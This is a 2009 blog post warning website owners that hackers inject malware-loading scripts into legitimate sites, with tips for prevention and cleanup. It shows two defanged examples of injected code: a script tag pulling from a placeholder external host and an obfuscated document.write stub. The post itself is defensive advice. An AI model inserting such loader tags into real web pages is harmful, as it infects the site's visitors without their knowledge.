Just like the tutorials you find in our database are DoFollow
so are the comments here at the blog!



Are you spreading malware?

Tags:   · · | October 27th, 2009 by admin
Respond | Comments | 815 views

Websense, a web security company, said in a recent report called the State of Internet Security, that 70 percent of the top 100 sites had been hacked to serve malware to unsuspecting users.

Over the past few months there has been a growing movement in the internet security world, hackers hacking legitimate websites and adding malware.

Websense

For a passive website administrator, in most cases, administrators aren't even aware of it.

Hackers find a vulneribility in your website and use it to gain access to your website control panel, once there they use FTP to attach a line of code to your files.

The line of code typically will look like:

- script type="text/javascript" src="http://www.SOMESITENAME.com/log/loga.php">/script

- script
document[.]write(unescape("a bunch of characters here"));
/script

one or the other will typically be added just before your closing "head" tag, or in a few cases, in your footer.

Both are malware, and will be downloaded to anyone who loads your website, without them even knowing.

A client's site was recently a victim of this, I discovered that the hackers most likely gained access via outdated contact forms.

Things you can do to help prevent this are:

- making sure ALL scripts on your site are up to date

- use a secure PHP contact form

- monitor your site files to see if they all have the same 'last modified' time stamp, if they do, you most likely were hit

- use a secure password, the folks over at Bytes Interactive have a good password generator you can use for FREE

What to do if you have it already:

- Immediately take your site off-line to prevent any other users from being infected

- check all of your files for any strange coding and remove it

- change your FTP and Control Panel passwords

- notify your host

- check to make sure Google hasn't labelled your site a malware site, if they have they will remove it once they crawl it again and find no infections, they will even tell you what pages still are infected once you contact them

The following article from XBIZ has some more details, their site is geared towards adult webmasters, but it applies to everyone.

I hope everyone's site is good, please pass this on to your friends.

If you have any other tips, please leave us a comment below.

Popularity: 25% [?]

Related Posts :

Related Posts

No related posts found

 
blog comments powered by Disqus


All tutorials open in new windows. User-generated content is licensed under a Creative Commons Public Domain license.
Tutorials submitted to FAQ PAL have not been tested by the staff of FAQ PAL, use of these tutorials is at your own risk.
FAQ PAL does not offer support for any tutorial in our database, however, please feel free to post a comment and maybe a fellow member can help you.
Designed by Pliggs & by UP Designs | Blog portion of FAQPAL.com was built on the Cutline Theme by Chris Pearson.
 
 
 


Thumbshots on the blog generously supplied by SEO Powered by Platinum SEO from Techblissonline